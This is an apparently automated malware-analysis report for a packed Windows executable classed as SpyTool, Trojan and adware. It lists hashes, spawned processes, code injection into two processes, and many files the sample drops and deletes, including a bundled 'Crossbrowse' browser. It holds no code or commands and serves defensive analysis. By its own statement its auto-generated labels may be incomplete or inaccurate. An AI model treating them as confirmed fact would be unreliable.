not-a-virus:AdWare.NSIS.ConvertAd.fes (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 688ed6718599ebcc64cea4819f60c087
SHA1: 74b2aa40fbbbd1525830a4cb6b0cf74699af1762
SHA256: c7420350465f6a45d9f7c3eb3a461821077f2578dc93cb7ef2dec15b8b1715f0
SSDeep: 6144:es2O4vg2Tes8jyM3G6WysTyun/eIktA0nVHe:YOAZv8XG6Wy6z2Ikt7U
Size: 232149 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
nsg13.tmp:912
%original file name%.exe:1504
nsa19.tmp:648
nsa19.tmp:364
gmsd_re_005010077.exe:1880
fsd34.exe:1368
nsm32.tmp:444
setup.exe:564
taskkill.exe:640
taskkill.exe:584
taskkill.exe:952
upgmsd_re_005010077.exe:1364
amisid.exe:1512
amisid.exe:1556
tasklist.exe:164
tasklist.exe:1540
nst16.tmp:1340
nsh2B.tmp:344
nsh2B.tmp:1860
encrypt.exe:560
encrypt.exe:1400
encrypt.exe:424
encrypt.exe:460
3075.exe:976
nsiB.tmp:644
nsw7.tmp:1688
nst36.tmp:2008
nsw22.tmp:272
The SpyTool injects its code into the following process(es):
nsq3D.tmp:240
nsm25.tmp:240
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsg13.tmp:912 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3075.exe (14022 bytes)
The process %original file name%.exe:1504 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (20572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3D.tmp (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\inetc.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (0 bytes)
The process nsa19.tmp:648 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)
The process nsa19.tmp:364 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (544 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (0 bytes)
The process gmsd_re_005010077.exe:1880 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\gmsd_re_005010077\1.20\cnf.cyl (269 bytes)
The process nsq3D.tmp:240 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\SecondResult.txt (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Math.dll (2489 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp (0 bytes)
The process fsd34.exe:1368 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
The process nsm32.tmp:444 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe (1479345 bytes)
The process setup.exe:564 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin (4 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
